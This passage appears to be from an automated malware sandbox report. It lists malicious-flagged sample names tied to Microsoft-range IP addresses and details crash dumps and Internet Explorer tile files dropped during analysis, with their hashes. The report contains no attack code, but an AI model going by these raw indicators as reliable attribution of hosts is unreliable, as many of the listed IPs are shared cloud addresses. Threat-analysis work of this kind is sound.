                                    Cleared_Payment_Notification_1588-5755.HTmlGet hashmaliciousBrowse
                                    • 52.97.232.210
                                    ORIGINAL.EXEGet hashmaliciousBrowse
                                    • 52.97.186.114

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    MICROSOFT-CORP-MSN-AS-BLOCKUS2oxhsHaX3D.exeGet hashmaliciousBrowse
                                    • 13.107.4.50
                                    iKcDLx5Wxc.exeGet hashmaliciousBrowse
                                    • 104.43.139.144
                                    r6.zip.exeGet hashmaliciousBrowse
                                    • 52.239.214.132
                                    recovered_bin2Get hashmaliciousBrowse
                                    • 52.228.135.155
                                    Cmh_Fax-Message-3865.htmlGet hashmaliciousBrowse
                                    • 20.199.16.46
                                    5.dllGet hashmaliciousBrowse
                                    • 40.97.116.82
                                    sud-life-mobcast.apkGet hashmaliciousBrowse
                                    • 104.45.180.93
                                    sud-life-outwork.apkGet hashmaliciousBrowse
                                    • 104.45.180.93
                                    Flwphoptcdyxlxhpejlfjgmsyzqkhoqweu.exeGet hashmaliciousBrowse
                                    • 20.80.30.45
                                    2790000.dllGet hashmaliciousBrowse
                                    • 40.101.136.2
                                    2770174.dllGet hashmaliciousBrowse
                                    • 40.101.136.2
                                    60e40fb428612.dllGet hashmaliciousBrowse
                                    • 52.97.201.18
                                    9cYXsscTTT.exeGet hashmaliciousBrowse
                                    • 104.42.151.234
                                    TestTakerSBBrowser.exeGet hashmaliciousBrowse
                                    • 137.117.66.167
                                    mJSDCeNxFi.exeGet hashmaliciousBrowse
                                    • 40.88.32.150
                                    oEE058tCoG.exeGet hashmaliciousBrowse
                                    • 40.93.212.0
                                    zHUScMPOlZ.dllGet hashmaliciousBrowse
                                    • 40.97.116.82
                                    hsIF8b0YX1.msiGet hashmaliciousBrowse
                                    • 191.235.71.131
                                    x86_x64_setup.exeGet hashmaliciousBrowse
                                    • 104.43.193.48
                                    h3hlbLDpl8.exeGet hashmaliciousBrowse
                                    • 13.64.90.137
                                    MICROSOFT-CORP-MSN-AS-BLOCKUS2oxhsHaX3D.exeGet hashmaliciousBrowse
                                    • 13.107.4.50
                                    iKcDLx5Wxc.exeGet hashmaliciousBrowse
                                    • 104.43.139.144
                                    r6.zip.exeGet hashmaliciousBrowse
                                    • 52.239.214.132
                                    recovered_bin2Get hashmaliciousBrowse
                                    • 52.228.135.155
                                    Cmh_Fax-Message-3865.htmlGet hashmaliciousBrowse
                                    • 20.199.16.46
                                    5.dllGet hashmaliciousBrowse
                                    • 40.97.116.82
                                    sud-life-mobcast.apkGet hashmaliciousBrowse
                                    • 104.45.180.93
                                    sud-life-outwork.apkGet hashmaliciousBrowse
                                    • 104.45.180.93
                                    Flwphoptcdyxlxhpejlfjgmsyzqkhoqweu.exeGet hashmaliciousBrowse
                                    • 20.80.30.45
                                    2790000.dllGet hashmaliciousBrowse
                                    • 40.101.136.2
                                    2770174.dllGet hashmaliciousBrowse
                                    • 40.101.136.2
                                    60e40fb428612.dllGet hashmaliciousBrowse
                                    • 52.97.201.18
                                    9cYXsscTTT.exeGet hashmaliciousBrowse
                                    • 104.42.151.234
                                    TestTakerSBBrowser.exeGet hashmaliciousBrowse
                                    • 137.117.66.167
                                    mJSDCeNxFi.exeGet hashmaliciousBrowse
                                    • 40.88.32.150
                                    oEE058tCoG.exeGet hashmaliciousBrowse
                                    • 40.93.212.0
                                    zHUScMPOlZ.dllGet hashmaliciousBrowse
                                    • 40.97.116.82
                                    hsIF8b0YX1.msiGet hashmaliciousBrowse
                                    • 191.235.71.131
                                    x86_x64_setup.exeGet hashmaliciousBrowse
                                    • 104.43.193.48
                                    h3hlbLDpl8.exeGet hashmaliciousBrowse
                                    • 13.64.90.137

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_06e156cd\Report.wer
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):12274
                                    Entropy (8bit):3.7606060797507106
                                    Encrypted:false
                                    SSDEEP:192:orivB0oXSHygO+jed+k/u7skS274ItWcb:sinXqygO+jeR/u7skX4ItWcb
                                    MD5:E1949ED2D76CA2F7E656F75525C7214A
                                    SHA1:5B0DE9CE68B04F1D3B9D47663E295C08915D5B48
                                    SHA-256:E8046A932885BEEB5825A245B4FE4E4D8DF59F8BA5AFF5CE4936E80039FE0BC4
                                    SHA-512:AC9E9CE727C490D0AC9D14D4EB520D2DB606E8C0FF500801B52F0082CFF2D65E20A9593223CC73249072D8FFD5C72EB932A8ACD3B1985C964B586669EB895F2A
                                    Malicious:false
                                    Reputation:low
                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.3.4.3.0.8.1.4.0.3.0.4.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.0.3.4.3.0.8.8.7.6.2.4.0.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.c.6.c.e.2.7.-.4.8.f.2.-.4.c.d.a.-.b.b.9.d.-.f.9.7.6.2.5.a.c.d.9.1.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.5.e.4.e.5.f.-.1.4.6.7.-.4.0.4.a.-.a.e.2.9.-.f.1.0.6.8.6.6.1.0.8.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.6.0.-.0.0.0.1.-.0.0.1.7.-.0.9.5.f.-.1.8.0.2.1.1.7.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER301B.tmp.dmp
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Fri Jul 9 22:24:43 2021, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):60620
                                    Entropy (8bit):1.9423513089497042
                                    Encrypted:false
                                    SSDEEP:192:EJWIVZo6IqaxddJaMiFNG9NLtW5CunXlcW8YGUvDcWChpjCOmHtasnomQNqpW:WWI7olJxdbaMZ9FtWs2+WfLc9hCOuRh8
                                    MD5:1380CF80AF689C5D543F9B1B8986CDD8
                                    SHA1:B1C78C558C739C72F7196C32387B31CFDBF06761
                                    SHA-256:817B2C2DE7DBD5A81947B3D95CA0B129979E7A91AD1E91AC40B37C23DBF7ED9D
                                    SHA-512:F6B2994752EC0B2219832DEE02E10BE6C0A4135D4DE82034F35522ABEC0E8F382F7F26D078B3E2FDC531297A3D1EABEBF685371EBCE554B81D6FC590F922C522
                                    Malicious:false
                                    Reputation:low
                                    Preview: MDMP....... ..........`...................U...........B......`.......GenuineIntelW...........T.......`...R..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3ADA.tmp.WERInternalMetadata.xml
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8298
                                    Entropy (8bit):3.691360413633455
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNiLR64pP26Y+V6sygmfTkOSzCpDO89bTOsfkRm:RrlsNi96KP26Yk65gmfTkOSUTNfP
                                    MD5:FF60444ABF2A813A7A238F2090DDF462
                                    SHA1:F5F60E50620687E086BA77DE4EC6FBA1244D31E4
                                    SHA-256:615243FDCD5BE5E6BF8412BB2BCDECE152E85883035283F04323D15B87FB5812
                                    SHA-512:5A0C913CB7C718C38556DC03EDE5CE97C50EDCFE18703559E07B65ADDCE32761716F13D46BD5A5362C0A0A4EF3BDF438F17741635A9EDA55B749D3ADBC270229
                                    Malicious:false
                                    Reputation:low
                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.3.2.<./.P.i.d.>.......
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF8.tmp.xml
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4630
                                    Entropy (8bit):4.450079077396599
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zs1JgtWI9r6P4WSC8BY8fm8M4JCds9FGx+q8/5q4SrS8ad:uITfPd5SN7JUxhDW/d
                                    MD5:56585D25B96640D7B66A5F2EBBA9D865
                                    SHA1:4B804FF08F079C98479A38C534F4851105E50D8C
                                    SHA-256:DEA4C309F7BE0022283E2B78CFFE988C01CDDCBA96039838674633FD11485029
                                    SHA-512:ADB806984E748F66AA5AFE42C06BFFD3638B9A3ECD8C364CE6776D7EF08531DDA96D32A3C6524FCEC083A9F84B61417899F834166CDD267C1EC994A2F3418844
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1070375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6C6C1DA9-E104-11EB-90E4-ECF4BB862DED}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):29272
                                    Entropy (8bit):1.7675208968892673
                                    Encrypted:false
                                    SSDEEP:48:Iw30GcprZfGwpLjGhG/ap8OtGIpcUwGWGvnZpvUtGogqp9UEGo4hpmUCGWuOEGW+:r3oZZpZjk2OfWUwetUTfU/hMUNoJVB
                                    MD5:21006F3BE1A506E4B2D3A7D675C3EBDD
                                    SHA1:4B46C9F4156FBE672987AC7BA44D9E3B12D452AF
                                    SHA-256:2A15B6133068778BA036876E43A2519E38433920A31EFB23BAA08013BEA921D2
                                    SHA-512:643BE0C532B07CDF93D7791294D387ED353A34ED50A554C1840E32F350684DBB5A5D7C9DCEF9FD0F3D2A1CE95284A0B6A73EE87B2933E3E991778B0BDFADA358
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):27388
                                    Entropy (8bit):1.8492333825151834
                                    Encrypted:false
                                    SSDEEP:96:rpZeQ668BSOj12tWdMBOqQF/9PRqQF/9MpA:rpZeQ668kOj12tWdMBOqCFPRqCF0A
                                    MD5:FE9CCD814B0F8DDE2AB3DABF6420BE47
                                    SHA1:4A13D13C7681D3625C0A877A59D47CB2F4F3237D
                                    SHA-256:C6622CFBD0FC7E8D998683132E490EFC4B9DEDC4AEA47F90409C93C95E014B65
                                    SHA-512:286A8FE0ABB4D960C91A2628A664236A54FBD90FF60597FE68137E07471D2F212C59DB298B680C2CB752B5F57B2C689120B2C89E422001CB4754183316DAFD53
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.1203165948199825
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxOE8AeZ7AeZAnWimI002EtM3MHdNMNxOE8AeZ7AeZAnWimI00ObVbkEty:2d6NxOplqSZHKd6NxOplqSZ76b
                                    MD5:8D599BEF9D241754D23ECCECFD30C7A6
                                    SHA1:51A406A8931432436C370EA1078E7BE3FA17889D
                                    SHA-256:2C23AA2A761171E479E8DA74AF011AEDA89AD4ABEE4FAEBF3DD0496EFA5AFE2D
                                    SHA-512:5B0A837124CE8EDFB3188256F3EE28A78577070A0176CFDE0FB5576D2922AB1340C392BBF7F07683F9108561B46D08579D806E067D7669723E8DC363676DBA38
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.134563004044832
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxe2k86Z76ZAnWimI002EtM3MHdNMNxe2k86Z76ZAnWimI00Obkak6EtMb:2d6NxrJIfSZHKd6NxrJIfSZ7Aa7b
                                    MD5:4968B66BBB4A88C515D2C48C5F7D86FE
                                    SHA1:9A7A7C9FCC6E181E0AC824DB06D7CE4504F7421C
                                    SHA-256:FE0A0417B43404C5378D17300F8DA55E8A75E852BBE027A5DC3F6D82C0E6ED64
                                    SHA-512:3EB1E1738241EA8A8D59906A5FBF17E7AA0588C065377687CA8D3FCB791418235D9FC44F3BD016D441AF009FA7FC2C58DC454111186F470A0368D323F88D0362
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x441e92db,0x01d77511</date><accdate>0x441e92db,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x441e92db,0x01d77511</date><accdate>0x441e92db,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):662
                                    Entropy (8bit):5.139226419193965
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxvL8AeZ7AeZAnWimI002EtM3MHdNMNxvL8AeZ7AeZAnWimI00ObmZEtMb:2d6NxvglqSZHKd6NxvglqSZ7mb
                                    MD5:E65305058781D1E10E76451B366CC50B
                                    SHA1:A4D4324D1D8A0807B3252A6CC897B2ADAB930F7E
                                    SHA-256:248168AC56792FD9991B18F14E4B5AE6117F9BE7AA56800E97BBD5CF7FCFA199
                                    SHA-512:D9B19329BE9172E086822E4FCA3B21F431C1BC201C992E75FC2DD73D61582628D0A3A38747DE74031E720A52B080F0D691CBEA6F474B76A77427556720CFD091
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):647
                                    Entropy (8bit):5.136436978120072
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxi8AeZ7AeZAnWimI002EtM3MHdNMNxi8AeZ7AeZAnWimI00Obd5EtMb:2d6Nx3lqSZHKd6Nx3lqSZ7Jjb
                                    MD5:C6E669BDEEEAB022234DE6E073CDF6EB
                                    SHA1:B511F8C524D80A8C2FDFE95BDA8F8D3E0D291F37
                                    SHA-256:F2CFC7DA7D96C261CEE7A5D4F2A9662543CA5293B05EDDDB9277CDCB077471CC
                                    SHA-512:7C108964C022559DB1014A2AADACEA1395FBA223B106F846EAFA16B1F1C0675F6B3C6A81B0B51A9DEEC416F8472E6E4AB835B1593953AA771CD4E565CCFAE818
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.151417094368856
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxhGw8AeZ7AeZAnWimI002EtM3MHdNMNxhGw8AeZ7AeZAnWimI00Ob8K0z:2d6NxQVlqSZHKd6NxQVlqSZ7YKajb
                                    MD5:BD0CE2FC38BCF545CAB4BE1835DC5E18
                                    SHA1:A664B1DB83548D55CA28B2EBB79451A2749107D8
                                    SHA-256:E1C0BED752BBC87034EA8863531BAB3922A3E6F8E08BF981200C17DDEAC8F2A1
                                    SHA-512:32BB1B156E95FAED8525354D0A145EE4BCFBA0E5DD6FAD8C7EEB6D1BC2BCA147B014C487105261FEB988526A0EE9A16F63F5AF2F7A972C0C8CF78A964F8CB2E1
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.123606740322444
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNx0n8AeZ7AeZAnWimI002EtM3MHdNMNx0n8AeZ7AeZAnWimI00ObxEtMb:2d6Nx08lqSZHKd6Nx08lqSZ7nb
                                    MD5:F3FAA80C08BA5526AB523C40946E247E
                                    SHA1:6A1E77975DB7D3AC5B0FBE42A3914BD443628F5C
                                    SHA-256:D449DCB79EC7D2030DFB93AF8BED6A3085BB42166B673476092D78309301A397
                                    SHA-512:70C9AFB28FDDED7E6F06C56A292AA936CA682F9817102E15EAA8CDEFD8BF472BF822EF8FD47FC1D484CB076D532220B18F39E91E8A0AC3064F0DDC60A9C3C1B7
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.160740296090679
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxx8AeZ7AeZAnWimI002EtM3MHdNMNxx8AeZ7AeZAnWimI00Ob6Kq5EtMb:2d6Nx2lqSZHKd6Nx2lqSZ7ob
                                    MD5:48714DF7C36784927086738C16F5C2A4
                                    SHA1:C324557392A9AF2D1AD017801F5FC5A957CC6F52
                                    SHA-256:C9E7147C35DE4F86CA8D51D49FB2F0814D1782BDD79247FDC593CD315C0DC771
                                    SHA-512:381DDB57101A933CFDC76B412D6DD4B51EE2FEDF06B865CC560A66CE53FB52B751B458A98A47FCBE46CB7FF2403C44B26508B4A5D9C0B8ABAAF00E48D80F498D
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):659
                                    Entropy (8bit):5.137318022838918
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxc8AeZ7AeZAnWimI002EtM3MHdNMNxc8AeZ7AeZAnWimI00ObVEtMb:2d6NxRlqSZHKd6NxRlqSZ7Db
                                    MD5:697674F7D0D805F23E186232B6424E05
                                    SHA1:DCA130BAD20BDAAF493075711E0FE57A9A3B3E66
                                    SHA-256:530058573C14408B947F9CD92DCE93C2AFC8277D87440BF8DDF364F3EB4C7A8A
                                    SHA-512:F04C1267D749CE5230A6C2CD42AADE9847650A33020CA2D7DE18F3D5E0FAC65BD796110DE93F958244D8010E8A955367FBA6878077EF46689E90976C1368724F
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.121867956514355
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxfn8AeZ7AeZAnWimI002EtM3MHdNMNxfn8AeZ7AeZAnWimI00Obe5EtMb:2d6NxElqSZHKd6NxElqSZ7ijb
                                    MD5:9A27A88CF938E3C4E0CC0269958A1E58
                                    SHA1:4D9817EE61624324D4C4B12F44DADC56A0A4C22C
                                    SHA-256:1AF855867CF3E2A780A6A0446CF441CA6C38DFC5618E08F53A95BF3BDA43E5DC
                                    SHA-512:84FF9935B33C728DCDE14016A22DB8EABA513D26609A6D3BB865B5388DF4C463750A396A39AA996A17CB2F5ED3B60043C2926F5873E919A3E6B532A3004E8EB8
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
